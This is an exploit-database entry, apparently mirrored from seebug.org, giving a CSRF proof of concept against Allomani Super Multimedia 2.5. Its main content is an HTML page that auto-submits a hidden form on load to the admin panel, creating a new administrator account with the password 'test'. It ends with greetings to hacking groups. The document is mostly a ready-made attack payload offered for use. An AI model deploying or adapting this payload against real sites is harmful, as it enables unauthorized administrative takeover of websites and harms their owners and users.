Allomani - Super Multimedia 2.5 - CSRF Add Admin Account

2014-07-0100:00:00

Root

www.seebug.org

JSON

No description provided by source.


                                                # Exploit Title: Allomani - Super Multimedia v2.5 - [CSRF] Add Admin Account
# Date: 29-06-2010
# Author: G0D-F4Th3r
# Software Link: http://allomani.com
# Version: 2.5

####################################################
&#60;html&#62;
&#60;body onload=&#34;javascript:fireForms()&#34;&#62;
&#60;form method=&#34;POST&#34; name=&#34;form0&#34; action=&#34;
http://www.site.com/[path]/admin/index.php&#34;&#62;
&#60;input type=&#34;hidden&#34; name=&#34;action&#34; value=&#34;adduserok&#34;/&#62;
&#60;input type=&#34;hidden&#34; name=&#34;username&#34; value=&#34;test&#34;/&#62;
&#60;input type=&#34;hidden&#34; name=&#34;password&#34; value=&#34;test&#34;/&#62;
&#60;input type=&#34;hidden&#34; name=&#34;email&#34; value=&#34;[email protected]&#34;/&#62;
&#60;input type=&#34;hidden&#34; name=&#34;group_id&#34; value=&#34;1&#34;/&#62;
&#60;input type=&#34;hidden&#34; name=&#34;useraddbutton&#34; value=&#34;?????&#34;/&#62;
&#60;/form&#62;
&#60;/body&#62;
&#60;/html&#62;

##################################################################################
Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My
Friends
##################################################################################

JSON